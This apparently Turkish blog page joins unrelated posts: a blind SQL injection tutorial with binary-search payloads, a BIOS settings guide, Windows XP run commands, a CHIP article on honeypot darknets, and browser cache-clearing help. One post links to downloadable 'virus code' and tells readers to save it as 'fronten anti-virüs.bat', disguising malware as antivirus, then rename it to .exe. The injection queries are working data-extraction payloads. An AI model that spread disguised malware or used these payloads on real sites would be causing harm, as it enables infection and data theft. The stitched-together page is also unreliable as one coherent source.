Bir çoğumuz SQL cümlecikleri kullanarak veritabanlarımızda listeleme, güncelleme ve ekleme işlemleri yaparız. Fakat bu kullandığımız SQL cümleciklerinin ne tür sıkıntılar doğurabileceğinin üzerinde pek durmayız. Bir yazılımcı için önemli olan tüm kullanıcı listesini çekmek ise “SELECT * FROM users” yazmaktır. Belli bir numaraya sahip bir kullanıcı çekmek için ise “SELECT * FROM users WHERE UserID=101” yazmak yetecektir. Fakat kullandığımız programlama teknikleri bir kullanıcının bilgilerini çekmek için yazılan SQL cümleciğini çok tehlikeli durumlara sokabilir. Bu aslında bazen kullanılan dilin, bazen de yazılımcının tekniğinin sonucudur. Yine de ucu açık bir tartışma konusu diyebiliriz.

SQL Injection için söylenecekler çok fazla olsa da temel de problemin ortaya çıkış nedeni; cümleciğin herhangi bir yerine eklenen kod parçacıklarıyla farkedilir. Örneğin; “ ` ”  gönderip, sonucunun hata dönmesi gibi. Tabi bazen bu hata çıktılarıda işimizi görmeyebilir veya hata dönmeyebilir.  Blind hem SQL Injection açığını barındırmasıyla birlikte sonucun her zaman true/false dönmesiyle ilgilenir. Aslında bu açıklığın ciddi bir problem oluşturması temel bir matematik probleminin varlığıyla meydana gelmektedir.

Blind SQL Injection için örnek;

   Sorgu1:  SELECT Username FROM users WHERE userid=1
   Cevap : Fantastik

   Sorgu2: SELECT Username FROM users WHERE userid=121
   Cevap :

Görüldüğü gibi database de userid=1 de bir kullanıcı var, userid=121 de ise kullanıcı yok. Burda yapılan bir tane “true” değeri yakalayabilmek. Sorgu1 ile bu sağlanmış oldu. Bundan sonra yapılması gereken, görülen cevaba bakılarak sorgu üzerinde oynamalar yapmak. Her değişikliğimizde geri dönen cevap, yaptıklarımızla doğru yolda olup olmadığımızı söyleyecektir. Sorgu1`i biraz değiştirecek olursak;

   Sorgu1:  SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,1,1))=97
   Cevap :

Userid=1 için kullanıcının soyisminin ilk harfi “a” mıdır? Görüldüğü gibi bizim daha önce elde ettiğimiz içerik gelmedi. Biz her sorgumuz da bu içeriğin aynısının gelip gelmediğine bakıyoruz (Yukarıda cevabın true/false dönmesi ile farkedilir dediğimiz kısım).

   Sorgu1:  SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,1,1))=98
   Cevap :

Userid=1 için kullanıcının soyisminin ilk harfi “b” midir?

   Sorgu1:  SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,1,1))=68
   Cevap : Fantastik

Userid=1 için kullanıcının soyisminin ilk harfi “D” olarak karşımıza çıktı. Çünkü lastname`ni ilk karakterinin ASCII değeri 68. Bu da “D” harfine denk gelmektedir. Bu sorgumuzla birlikte daha önce görmüş olduğumuz içeriği (true) elde ederek farkettik.

   Sorgu1:  SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,2,1))=69
   Cevap :

Userid=1 için kullanıcının soyisminin ikinci harfi “E” midir?

   Sorgu1:  SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,2,1))=101
   Cevap : Fantastik

Userid=1 kullanıcısının soyisminin ikinci harfi “e” dir.

Buraya kadar Blind SQL Injection açığının ne olduğunu temel olarak görmüş olduk. Fakat tablo isimleri, tabloların alan adları, içindeki verileri böyle teker teker deneyerek bulmak nekadar zamanımızı alır? Muhtemelen a-z,A-Z ve 0-9 arasına bir de “?,-,+,* v.s” gibi karakterlerin de varlığını hesaba katarsak. Substring ile elde ettiğimiz tek karakteri deneyerek bulmak, bulanık bir zaman dilime gelecekti ki bu da elle imkansıza yakın. Tabi çok büyük verilerin bu şekilde alınmasından bahsediyoruz.

Şimdi ise bu problemi gerçekten kritik bir problem haline getiren matematiksel alt yapıyı ele alalım.

Algoritma Analizi ve Karmaşıklık

Aslında bir algoritmayı neden analiz etmek isteriz? Performansı ölçmek için, farklı algoritmalarla karşılaştırabilmek için, daha iyisi mümkün mü? Bir algoritmanın özelliklerini analiz ederken de çalışma zamanı ve hafıza da kapladığı alana bakarız. Tabi bu maddeleri çoğaltmak mümkün. Fakat genel kabul bir algoritmanın karmaşıklığı; çalışma hızı ve hafıza da kapladığı alanla belirlenir.  Biz şu an “zaman” problemi üzerinde duracağız. Çünkü Blind SQL Injection da gördüğümüz gibi teker teker deneme yoluyla bilgi toplamak gerçekten çok zor. Ancak bu deneme zaman aralığını (deneme sayısını) kısaltırsak bu problemi kullanışlı hale getirebiliriz. Zaman karmaşıklığı Büyük-O notasyonu ile gösterilir.

İkili Arama (Binary Search)

Problem çözümlerinde böl ve yönet prensibine dayanır. Çözüm süresini genelde ½ oranında bölerek zaman aralığını kısaltmayı hedefler. Bu algoritma da dikkat edilmesi gereken bir husus ise elemanların artan veya azalan şekilde sıralı olmasıdır. Arama işlemi ilk bölünmede sonuçlanmıyorsa tekrar alt kümeler de bölünerek arama işlemi devam eder. İkili arama algoritması için zaman karmaşıklığı O(logN)`dir.

Örnek verecek olursak;

Sayı olduğunu bildiğimiz bir alan da “2” sayısına ulaşabilmek için 0,1,2,3,4,5,6,7,8,9 u sırayla denesek 3. deneme de bulacaktık. Fakat bu tamamen şansımızla alakalıydı. Eğer aynı durum da “7” için bir arama yapıyor olsaydık bu sefer 8. Deneme de bu sayıyı bulacaktık. Fakat ikili arama lagoritması ile önce 5`den büyük veya küçük olduğuna bakılır. Küçükse soldan, büyükse sağdan devam edilir. Eşit ise durulur.

7 için;

7=5 (false)
7>5 (true)
7=7 (true)

3. denemede eşitliği yakaladık.

ASCII karakterler yardımıyla denemelerimizi yapmıştık. ASCII okunabilir karakterler 36-126 arasındadır.

   • f(n) = ?(log n)
   • f(126-32) = ?(log (126-32))?
   • ~7 karşılaştırmada karakterin doğruluğuna erişilir.

Yani bu aradaki tüm karakterler için en fazla 7 deneme yapmamız yeterlidir. Oysa 126-32=94 defa deneme yapmaktan kurtulmuş oluyoruz. Tabi bu her bir karakter için 94 defa bakılacak anlamına gelmez. Şansınız iyiyse bu sayı daha da küçülebilir. Fakat aynı durum ~7 için de geçerlidir.

Bu sayede bir karakter için harcamamız gereken maksimum deneme 7 olarak belirlemiş olduk. Peki deneme yapacağımız karakter sayısı çok fazla ise? Bu sefer deneme yapılan kümeyi biraz daha azaltabiliriz. Yukarıda örnekler de görüldüğü gibi “E” ve “e” harfleri bir birinden farklı olarak algılanmıştı. Eğer A-Z arasındaki büyük harfleri atar ve kontrol etmek istediğimiz karakteri lowercase`den geçirirsek?

   Sorgu1:  SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,1,1))=68
   Cevap : Fantastik

Bu sefer “D” harfi yerine “d” yi kontrol ederek

   Sorgu1:  SELECT Username FROM users WHERE userid=1 AND ASCII(LOWER(SUBSTRING(Lastname,1,1)))=100
   Cevap : FAntastik

Aynı sonuca erişebiliriz. Bu sayede deneme yapacağımız kümeyi ~6 indirebiliriz.

Bu sayede  en fazla 94 deneme yerine en fazla 6 deneme de istediimiz bilgiye erişme olanağı ortaya çıkmış oldu.

Özetle; binary search algoritmasının varlığı Blind Sql Injection`u daha tehlikeli hala sokuyor. Eğer bu şekilde bir algoritma olmasaydı bu açıklığın kullanılabilir olması pek mümkün olmayacaktı.

Kaynaklar

1) http://www.owasp.org/index.php/Blind_SQL_Injection
2) http://sqlmap.sourceforge.net/
3) http://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)

günümüzün asla tükenmiycek olan açıgı ;)

BIOS'un gizlerini su yüzüne çıkarın

Çoğu kullanıcının korkulu rüyası BIOS hakkında bilmeniz gerekenler... Hepsi burada...

Her bilgisayarda bulunan ve genel olarak kullanıcıların pek de müdahelede bulunmadığı BIOS, sistem için çok önemli fonksiyonları içerisinde barındırır.

Pek çok önemli işlevin yer aldığı BIOS ile örneğin sistem başlangıç ayarlarını yapabilir ve sisteminizle ilgili daha detaylı bilgilere yine BIOS altında ulaşabilirsiniz.

Ancak BIOS'un bilinmeyen pek çok yönü de bulunmaktadır. Bu nedenle bu yazımızda BIOS'la yapabileceklerinizi masaya yatıracağız.

BIOS'unuzla tanışın

Öncelikle BIOS'unuza nasıl ulaşabileceğinizi görelim. Genel olarak bilgisayarlarda BIOS'a ulaşmak için Del veya F2 butonları kullanılır. Bilgisayarınızı başlattığınızda siyah ekranda altta yazılı bulunan yazılara dikkat edin. Burada BIOS veya Setup olarak da belirtilen bölüme girebilmek için hangi butonun kullanılması gerektiği yazılıdır.

BIOS'a girdikten sonra ise ilk olarak sizi BIOS'un ana menüsü karşılar. Bu bölümde genellikle bazı önemli ayarlar yer almaktadır. Main, Advanced, Power, Boot ve Exit genel olarak BIOS'un alt menüleri olarak dikkat çeker.

Gün ve saat

Gerekmedikçe bu ayarı ellemenize lüzum yok; zira BIOS saati kendi halinde de normal bir şekilde çalışır ve BIOS pili tükenene kadar BIOS gün ve saati çalışmaya devam eder. Bu saatin veya günün bozulması durumunda ise ilk akla gelecek nokta BIOS pilinin bitmiş olma ihtimalidir.

Disket sürücü

BIOS altında disket sürücü bölümünü de ana menüde kolayca görebilirsiniz. Bilgisayarınızın hala bir disket sürücüsü varsa ancak kullanmıyorsanız, disket sürücünüzü "disable" yani "pasif" konuma getirerek bilgisayarınızın başlangıç hızını arttırabilirsiniz.

IDE/SATA kanalları

BIOS altında IDE ve SATA sürücülerini gösteren bir seçenekle karşılaşabilirsiniz. Burada bulunan sürücüler, bilgisayarınıza bağlı olan IDE ve SATA destekli diskleri betimler. Yeni bir diski bilgisayarınıza taktığınızda burada diskinizin sorunsuz bir şekilde çalışıp çalışmadığını hemen anlayabilirsiniz. Eğer bu bölümde görünen bir disk sürücü bulunmuyorsa, diskinizi gerektiği gibi anakarta bağladığınıza emin olmalısınız.

SATA ayarları

SATA ayarlarına girildiğinde RAID seçeneğiyle karşılaşacaksınız. Eğer birden fazla diski bilgisayarınıza bağladıysanız, RAID ayarlarına göz atabilirsiniz. Bazı kullanıcılar ACHI ayarını aktive ederek sabit disklerini hızlandırdığı iddiasındadır. Ancak bu ayarın ellenmesi halinde bilgisayarınız kendini başlatamayabilir ve bu konuda sıkıntı yaşayabilirsiniz. Bu nedenle AHCI fonksiyonuna gerekmedikçe dokunmamanızda fayda var.

IDE Detect Timeout

Bazı anakartlar bilgisayarınızı o kadar hızlı boot (başlatmak) eder ki, sabit diskler bile bu hıza yetişemez. Bu tip bir problemle uğraşmamak için ise IDE Detect Timeout olarak da bilinen bu sürecin aşılması gerekir. Bu nedenle eğer sabit diskiniz tanımlanmadan bilgisayarınız açılmaya çalışıyorsa bu bölümdeki değeri yüksek tutabilirsiniz.

Sürücüleri gerektiği gibi yüklemek

BIOS'u pek kullanmayan ancak pek çok kullanıcının yakından tanıdığı bir fonksiyon vardır. Boot sekmesi altında bilgisayarınıza girerek sürücülerin boot sıralamasını görebilirsiniz. Sabit diskinizi bu boot sırasının bir numarasına, diğer sürücüleri de kafanıza göre bu sıraya dahil edebilirsiniz. Ancak bu noktada önemli bir hatırlatma yapmak gerekiyor: Eğer Windows diskini optik sürücünüze koyduysanız ve Windows CD/DVD'sini bilgisayarın açılışında boot etmek istiyorsanız, sabit diski ikinci sıraya düşürüp optik sürücünüzü bu listede ilk sıraya yerleştirmeniz gerekiyor.

Tam ekran logo

Bilgisayarınız açılırken tam ekran logoyla karşılaşırsınız. Bu genellikle bilgisayarınızın veya anakartınızın logosunu içerir. İlgili ayarı pasifize ettiğinizde artık bu logoyla da karşılaşmak durumunda kalmayacaksınız.

Sistem bilgisi

DEL mesajını kaldırma

Bilgisayarınız açılırken karşınıza gelen "DEL butonuna basın" veya benzeri ibareyi isteğe bağlı olarak kaldırma şansına sahipsiniz. DEL ibaresini ortadan kaldırdığınızda özellikle çocukların bilgisayar kullanması dahilinde BIOS'a girmesinin önüne geçebilirsiniz.

Sistem bilgisi

Sistem bilgisi altında CPU tipi, CPU hızı, RAM miktarı ve BIOS sürümü gibi önemli bilgilere ulaşabilirsiniz. Eğer BIOS sürümünüz eskide kaldıysa, BIOS sürümü altında bunu rahatlıkla görebilirsiniz. Böylece BIOS'unuzu güncelleyebilir ve yeni donanımlara karşı bilgisayarınız daha uyumlu bir şekilde çalışabilir.

Suspend mode

ACPI Suspend Type olarak da bilinen bu fonksiyon, bilgisayarınızın uyku modunun (Sleep Mode) nasıl çalıştığına karar verir. İlgili ayarı S3 olarak belirlendiğinde tüm sürücüler kapalı konuma gelir; bu da bilgisayarınızın daha az enerji kullandığı anlamına gelir. Eğer bilgisayarınız uyandıktan sonra problem yaşıyorsanız ve sürücü güncelleştirmeleri de bu sorunu çözmüyorsa, S1 Suspend Mode'u tercih edebilirsiniz. Bu ayar, daha fazla sürücünün uyanık kalmasını sağlar.

PS/2 klavye ile PC'yi uyandırma

Eğer eski tip bir klavyeye sahipseniz (PS/2 gibi), klavyenizin herhangi bir butonuna tıklayarak bilgisayarınızı hemen açabilirsiniz.

Wake-On-LAN

Bu ayar sayesinde bilgisayarınız herhangi bir ağ aktivitesi tespit ettiğinizde otomatik olarak uyanır. Bu bölüm altında gerekli ayarların yapılması durumunda bilgisayarınızı internet üzerinden bile başlatabilirsiniz. LogMeIn tipi bir programı kullanarak uzaktan dosyalarınıza erişebilir, bilgisayarınızı bu şekilde evde değilken de kontrol edebilirsiniz.

PC Health Status

PC'nizin adeta sağlık durumunu gösteren PC Health Status altında bilgisayarınızın genel olarak sıcaklığını, voltaj değerlerini ve fan hızlarını görebilirsiniz.

Voltage monitor

Bilgisayarınızı, CPU'nuzu, hafızanızı ve diğer önemli donanım bileşenlerinin voltaj değerlerini gösterir.

Temperature monitor

Sıcaklık değeri donanımlarınız için son derece önemlidir. Özellikle işlemciniz söz konusuysa, CPU sıcaklığını yakından takip etmenizde fayda vardır. İşlemci modellerine göre çeşitlilik göstermekle birlikte her işlemcinin belirli bir sıcaklığın üzerine çıkmaması gerekir. Aksi taktirde işlemcinizin aşırı ısınması bilgisayarınızın normal bir şekilde çalışamamasına neden olur.

Fan speed monitor

Bu ayar altında fan hızınızı takip edebilirsiniz.

Intel SpeedStep

AMD sistemlerinde Cool n Quiet olarak da bilinen bu ayar ile güç tasarrufu yapabilir, CPU voltajını azaltarak fan sesinizi kısabilirsiniz. Windows Vista kullanıcıları bu ayara Denetim Masası'ndan ulaşabiliyor.

Integrated Peripherals

Bu ayar altında anakarta bağlı olan tüm sürücülerinizi listeleyebilir (firewire, network portları, ses gibi) ve bu sürücüleri dilediğiniz gibi pasifize edebilirsiniz. Böylece kullanılmayan sürücüleri pasif konuma getirebilir ve donanım çakışmalarının önüne geçebilirsiniz.

Bunun dışında CPU ve RAM hızınızı da overclock denilen yöntemle arttırabilmeniz mümkün. Ancak CPU'nuzun hızını fazla arttırmaya çalıştığında işlemci sıcaklığınız da artacağından işlemcinizle başınız ciddi bir şekilde derde girebilir.

dikkat tehlikeli VİRÜS kod

antiler kodları virüs olarak görüyor ve bloguma erişimi engelliyordu bu yüzden txt olarak veriyorum..

http://webkanki.com/ByEge-virus.txt

kopyala not defterıne yapıstır sonra farklı kaydet fronten anti-virüs.bat olarak kaydedin kaydettikten sonra uzantısını (formatını) .exe olarak değiştirin.

Uyarı  :  Bu virüs kodunu kullanan kişilerin yaptıkları veya yapacaklarından hiçbir şekilde sorumlu olmam..hiçbir mesuliyet kabul etmiyorum..
arkadaşlar bu virüs'ü oluşturduktan sonra yakın çevrenizdeki insanlarda denemeyiniz ciddi zararlara yol açabilir.. olmadık taşa baş yardırmaya luzum yok...

xp deki programlar calıştıra yaz

exe uzantılıları Başlat-calıştır girin ordan yazın çalıssın

1) Karakter Eşlem = charmap.exe
2) Disk temizleme = cleanmgr.exe
3) Pano defteri görüntüleyici = clipbrd.exe (panoya alınmış bilgiyi gösterir)
4) Dr Watson = drwtsn32.exe (Aksaklıkları giderme aracı)
5) DirectX tanısı = dxdiag.exe (DirectX&l039;i inceleme ve test etme)
6) Özel karakter düzenleyici = eudcedit.exe 0(yeni karakter oluşturma veya düzenleme)
7) IExpress Sihirbası= iexpress.exe (self-extracting ve self-installing paketleri oluşturmak)
Microsoft Eşitleme Yöneticisi = mobsync.exe (ÇEvrimdışı kullanım için network ve internet eşitleme yöneticisi).
9) Windows Media Player 5.1 = mplay32.exe
10) ODBC Veri KAynağı Yöneticisi = odbcad32.exe (Veri tabanları için kullanılır)
11) Nesne Paketleyici = packager.exe
12) Sistem Monitörü = perfmon.exe (Oldukça kullanışlı, hızlı ayarlanabilir , PC nizle ilgili istediğiniz performans bilgilerine anında ulaşma imkanı)
13) Program Yöneticisi = progman.exe (Windows 3.x kabuğu).
14) Ağ bağlantıları için Rehber = rasphone.exe
15) Registry Editörü = regedt32.exe
16) Paylaştırılmıl Klasör oluşturma Sihirbası = shrpubw.exe
17) Dosya İmza Doğrulama Aracı = sigverif.exe
18Ses Kontrol Aracı = sndvol32.exe
19) Sistem Ayar Editörü = sysedit.exe (System.ini, Win.ini, Config.sys ve Autoexec.bat dosyalarında değişiklik imkanı sonar).
20) Syskey = syskey.exe (XP hesap veritabanını korumaya alma - Bir kere etkinleştirildiğinde bu şifreleme devre dışı brakılamaz).
21) Microsoft Telnet Alıcısı = telnet.exe
22) Sürücü Doğrulama Yöneticisi = verifier.exe
23) Windows for Workgroups Chat = winchat.exe (Sisteminiz bir ağ&l039;a sahipse)
24) Sistem Ayarları = msconfig.exe
25) gpedit.msc (grup yönetimi)
26) certmgr.msc -sertifika yardımcısı
27) ciadv.msc-Dizinleme sihirbazı
28 compmgmt.msc-bilgisayar yöneticisi
29) dfrg.msc -Defrag
30) diskmgmt.msc -Disk Yöneticisi
31) eudcedit.exe -özel karakter düzenleyicisi
32) jetcomp.exe -veritabanı sıkıştırıcısı
33) magnify.exe -büyüteç
34) mplayer2.exe -windows media player 6.4
35) mstsc.exe -uzak masaüstü bağlantısı BUNU DENEYIN COK KOLAYINIZA GELECEK
36) nslookup.exe -baglı bulundugunuz nameserveri izler
37) osk.exe -ekran klavyesi (çok ii)

İnternetin saklı adresleri: Karanlık ağlar

Aramayla bulunmayan adresler

Tarayıcıdaki adres satırına yazdıklarınızla internetin tamamına erişebildiğinizi mi düşünüyorsunuz? Hayır, gözlerden uzak, karanlık köşelerde gizli bir internet var. Ne aramayla bulabilirsiniz, ne de ait değilseniz adresini bilirsiniz. İşte bu makalemizde, bu karanlık ağların amaçlarını ve özelliklerini anlatıyoruz.

İki tür "Darknet" yani karanlık internet vardır, bunlardan ilki hacker avlamak için örülmüş karanlık ağlardır. İkincisi ise gizli dosya ve bilgi paylaşımı için kullanılan, gizli bir internettir. Her iki ağ türünden de sayısı bilinmez ama bolca vardır. Hem de yıllardır...

İnternete paralel bir şekilde çalışan ilk karanlık ağ çeşidi, kullanımdaki IP adreslerinden oluşur. Ancak bu IP adresleri açık bir şekilde bilinmez ve arama motorları tarafından endekslenmez. Yani arama sonuçlarıyla bulmak mümkün değildir.

Google'ın bulamadıklar

Karanlık ağlara internet tarayıcıda direkt IP'sini yazmadan erişemezsiniz. Adlarını bilseniz bile adres satırına yazdığınızda karşınıza bir site çıkmaz. Çünkü bu IP'ler Domain Name Server'larda, yani alan adı sunucularında yer almadıkları için bu şekilde erişime açık değildirler.

Bu IP'ler her zaman sitelere de ait değildir, örneğin bazı şirket ağları bu şekilde çalışır. Dışarıdan işi olmayan insanların erişimine gerek ya da izin yoktur.

Anti-virüs yazılımı üreten güvenlik şirketlerinin de bu şekilde gizli sunucuları vardır. Pek

çok bilgisayar yem olarak bu şekilde ortada bırakılır. Normal kullanıcıların bunlara girmesi gibi bir risk yoktur. Zaten bu siteler de ziyaretçilere zarar vermezler. Amaç kayıt tutmaktır.

Hacker kapanı

 Bir hacker'ı nasıl yakalarsınız?

Online güvenlik araştırmacılarının uzun süredir sorduğu bu soru, hackerların arz ettiği tehlike arttıkça daha çok önem kazandı. Hackerları yakalamanın bir yolu saldırı sonrasında izleri takip etmektir. İzleri en iyi şekilde kaydetmenin yolu da direkt saldırıya uğrayan sunucuların takibidir.

Anti-hackerlar sadece saldırıya uğrayan sitelerdeki izleri incelemezler. Karanlık ağlar örüp, hackerların buralara düşmesini beklerler. Yamasız, korumasız bilgisayarlar, savunmasız bir şekilde internet erişimiyle bırakılırlar. Böylece hacker saldırılarının hedefi olurlar.

Saldırıya uğrayan bilgisayarlara yüklenen zararlı yazılımlar, araştırmacılar tarafından incelenir. Bilgisayar girişi yöntemleri de analiz edilerek, güvenlik açıklarının tespiti yapılır. Hackerların kullandığı araç ve yöntemler kaydedilir. Zararsız görünen bu yemler, çok önemli bilgi toplama araçlarıdır.

Ne kadar zaman alır?

 Hackerlar sadece saldırdıkları bilgisayarı çökertmez. Bazen de bu bilgisayarları diğer bilgisayarlara saldırılarda kullanmak üzere bot ağlarının parçası haline getirirler. Sıradan kullanıcıların pek çoğunun bilgisayarı saatli bomba gibidir. Kullanıcının farkında olmadığı zararlı yazılımlar uykuda bekler ve hackerın komutuyla toplu şekilde saldırıya geçer.

Hackerlar devamlı ağı tarayıp bu tarz savunmasız bilgisayarları tespit ederler. Araştırmacıların yem olarak ortada bıraktığı bilgisayarlar, ağda sadece 4 saat içerisinde zararlı yazılımların hedefi olmaya başlar.

Gerçekten de inanılmaz derecede kısa bir süre.

Ancak her şey göründüğü gibi değildir. Bu zararsız görünen bilgisayarlar aslında oldukça sofistike bir yazılım çalıştırır.

Her şey göründüğü gibi değil!

 Bu yazılım masum bir bilgisayarı taklit eder. Üzerinde kurulu olan yazılımların yama seviyelerine kadar,

çok detaylı bir şekilde gerçekleştirilen taklit gerçeğinden ayırt edilemeyecek kadar başarılıdır. Gelen bağlantı isteklerini alır ve gerçek bir bilgisayarın vereceği tepkileri verir. Bu esnada olan biten her şeyi kaydederler.

Bu hacker tuzakları kasıtlı olarak yavaş çalışırlar. Bu sayede zararlı yazılımların yayılma hızı da düşürülmüş olur. Kaydedilen verilen analiz edildiğinde, bu zararlı yazılımlara karşı çözümler üretilir.

TCP/IP Protokolünün çalışma prensipleri sayesinde, bu sitelerdeki trafiğin yanlış yorumlanmasına ya da masum kullanıcıların girmesine imkan yoktur. Bu sistemlerin endekslenmemesinin sebebi de budur, karanlıkta tutulan bu ağlara ancak bulaşacak yeni PC arayan zararlı yazılımlar ya da ele geçirecek bilgisayar arayan hackerlar erişir.

DDoS saldırısının tespiti

Internet hareket detektörü ya da

internet teleskopu olarak da bilinen bu yöntem sayesinde DDoS: Distributed Denial of Service saldırıları da tespit edilir. Bu saldırılarda ele geçirilmiş çok sayıda bilgisayar kullanılır.

Hepsi birden belirlenen adreslere veri yollayarak bir kaba kuvvet saldırısı gerçekleştirirler. Karşı taraftaki sunucu gelen istekler içerisinde boğulur. Çok fazla bilgisayardan, farklı IP adreslerinden gerçekleştirilen saldırıların bütün kaynaklarının tespit edilmesi ve engellenmesi zordur.

Veri alındı mesajları iletildiğinde, bu paketlerin bir kısmı da karanlık ağdaki güvenlik şirketi bilgisayarlarına ulaşır. Yem bilgisayarlar sayesinde hedefler erkenden belirlenebilir. Veri paketlerinin içinde yer alan sıra bilgilerinin analizi, saldırının hızı ve şiddeti hakkında bilgi verir.

Bir başka tür karanlık ağ

Bir diğer çeşit karanlık ağlar ise dosya paylaşım ağlarıdır. Genellikle yasadışı dosya transferi için kullanılan bu ağlar,

internet üzerinde kolayca bulunmayı pek istemezler. Bu yüzden de karanlık köşelerde çalışırlar.

Bu karanlık ağ çeşidi hayatına "Sneaker net" olarak başlamıştır. Kullanıcıların öğrenci terimiyle "tabanvay" olarak adlandırdığı bu ağ, kullanıcıların çantalarına kaset ve CD'leri doldurup arkadaşlarıyla paylaşmaya götürmesiyle ortaya çıkmıştır. Arkadaşlar birbirine haber verir ve böylece toplumun bilmediği gizli bir veri transfer ağı kurulmuş olur. İnternetin devreye girmesiyle birlikte kullanımı azaldıysa da devam etmektedir.

İlk internet tabanlı paylaşım platformları, güvensiz ya da halka açık FTP sunucularıdır. Kullanıcılar buraya dosya yükleyerek paylaşım yapmıştır. Halen de bu şekilde bir kullanım devam etmektedir.

Dosya paylaşımı

 Ancak FTP'nin kullanımı, kanunların devreye girmesiyle azalmıştır. Sunuculardaki yasadışı veriler tespit edildiği ve ceza kesildiği için kullanıcılar P2P'a dönmüştür. Yasadışı dosya paylaşan sunucular kolayca tespit edilip kapatılabilir. Elbette RapidShare gibi buna direnebilen devler de mevcuttur.

Ama her kullanıcı kendi bilgisayarında bir miktar veri paylaşır ve bunu

internet üzerinde dağıtırsa tespiti oldukça zordur. Bu yöntem sunucuların kapatılmasından darbe almaz. Bir ya da daha fazla kullanıcı çıksa da varlığını sürdürür.

Dosya paylaşımcıları sunuculardan yararlanmanın farklı bir yolunu bulmuştur. Dosyalar yerine dosya bağlantıları ve erişim bilgileri sunucuda depolanır. Bu sayede kanundan korunmuş olurlar. Günümüzde bu tür sunucular da baskıyla ve cezayla kapattırıldığı için işler iyice P2P'a yüklenmiştir. P2P'lar paylaşımcıların özel, karanlık ağlarıdır.

kaynak :  http://www.chip.com.tr/

Bilgisayar Tarayıcılardaki çerezleri temizleme

Tarayıcınızı yükseltme

Facebook deneyiminizi en iyi düzeye getirmek için lütfen internet tarayıcınızın en güncel sürümünü indirin. Aşağıdaki bağlantıları izlemeniz yeterlidir.

Windows:

Internet Explorer 7.0
Firefox 3.0

Mac OS:

Safari 3.0
Firefox 3.0

Önbelleğinizi ve tanımlama bilgilerinizi temizleme

Bazen Facebook'ta karşılaştığınız sorunların kaynağı internet tarayıcınız olabilir. Sorununuzu çözmek için, tarayıcınızın önbelleğini ve tanımlama bilgilerini temizlemeniz gerekebilir. Lütfen aşağıdaki talimatları izleyin.

Internet Explorer 6.0

1. "Araçlar"a, sonra da "Internet Seçenekleri"ne tıklayın.
2. "Genel" sekmesinde, "Geçici Internet Dosyaları" kısmında, "Dosyaları Sil" düğmesine tıklayın.
3. "Tanımlama Bilgisi Sil"i seçin.
4. "Kapat"a tıklayın.
5. Tarayıcıdan çıkın.

Internet Explorer 7.0

1. "Araçlar"a, sonra da "Gözatma Geçmişini Sil"e tıklayın.
2. "Geçici Internet Dosyaları" kısmında, "Dosyaları Sil"e tıklayın ve "Evet"i seçin.
3. "Tanımlama Bilgileri" kısmında, "Tanımlama Bilgisi Sil"e tıklayın ve "Evet"i seçin.
4. "Kapat"a tıklayın.
5. Tarayıcıdan çıkın.

Internet Explorer 8.0

1. Internet Explorer Araçlar menüsünde, "Internet Seçenekleri"ne tıklayın.
2. Internet Seçenekleri kutusu "Genel" sekmesinde açılır.
3. "Genel" sekmesinde Geçici Internet Dosyaları kısmında "Dosyaları Sil" düğmesine tıklayın.
4. Aynı sekmede "Tanımlama Bilgisi Sil"i seçin.
5. "Kapat"a tıklayın ve tarayıcıyı yeniden başlatın.

Safari 3.0

1. Safari'yi açın.
2. "Empty Cache" öğesini seçin.
3. "Are you sure?" mesajı çıktığında, "Empty" öğesini seçin.
4. "Preferences" öğesini, sonra da sırayla "Security" sekmesini, "Show Cookies" öğesini ve "Remove All" öğesini seçin.

PC için Firefox 2.0

1. "Araçlar"a tıklayın ve "Seçenekler"i seçin.
2. Gizlilik simgesine tıklayın.
3. Çerezler kısmında, "Çerezleri Göster" düğmesine, sonra da "Tüm Çerezleri Sil" düğmesine tıklayın.
4. "Özel Veriler" kısmında, "Ayarlar"a tıklayın ve "Tamam"ı seçmeden önce "Önbellek"in yanındaki kutunun işaretli olduğundan emin olun.
5. "Şimdi Temizle" bağlantısına tıklayın.
6. Tarayıcıdan çıkın.

Mac için Firefox 2.0

1. "Araçlar"a tıklayın ve "Özel Verileri Temizle"yi seçin.
2. "Önbellek" ve "Çerezler"in seçili olduğundan emin olun.
3. "Özel Verileri Şimdi Temizle"ye tıklayın.
4. Çıkın ve tarayıcıyı yeniden başlatın.

PC için Firefox 3.0

1. "Araçlar"a tıklayın ve "Özel Verileri Temizle"yi seçin.
2. "Önbellek" ve "Çerezler"in seçili olduğundan emin olun.
3. "Özel Verileri Şimdi Temizle"ye tıklayın.
4. Çıkın ve tarayıcıyı yeniden başlatın.


Mac için Firefox 3.0

1. "Araçlar"a tıklayın ve "Özel Verileri Temizle"yi seçin.
2. "Önbellek" ve "Çerezler"in seçili olduğundan emin olun.
3. "Özel Verileri Şimdi Temizle"ye tıklayın.
4. Çıkın ve tarayıcıyı yeniden başlatın.


Bu talimatlar sorununuzu çözmediği takdirde, tarayıcınızı en yeni sürümüne yükseltmenizi öneririz.

Daha fazla mahremiyet, akıllı fonksiyonlar, şık görünüm: Yeni nesil tarayıcılar birçok iyileştirmeyle pırıl pırıl parlıyor. CHIP Online hangi tarayıcıya gözünüz kapalı güvenmeniz gerektiğini gösteriyor.

Microsoft, Internet Explorer'ın 8. sürümünü piyasaya sürdüğünde Vista-tarayıcısı, anlamlı yeniliklerle ikna etmeyi başarmıştı. Bu özellikler sayesinde Firefox'a kaptırılan pazar payı tekrar geri kazanılmak isteniyordu; fakat rakipler de yerine durmuyor. Ayrıca Avrupa Birliği komitesi Windows 7'de tarayıcı seçim ekranının sunulmasını için baskı yapıyor.

Peki, hangi tarayıcıyı seçmelisiniz? CHIP Online büyük tarayıcı testi ile cevabı veriyor. Internet Explorer (IE), Firefox, Opera, Chrome ve Safari'nin güncel kararlı sürümlerini güvenlik, performans ve fonksiyonellik alanlarında teste tabi tuttuk. Sonuçları ilerleyen sayfalarda görebilirsiniz. Son sayfadaki detaylı bilgi tablosunda tüm teste en ince ayrıntısına kadar göz atabilirsiniz.

kaynak : http://www.chip.com.tr/konu/web-tarayicilar-testte-guvenlik-tarayicilar-ates-altinda_16993_2.html

Google'a erişim sorunu

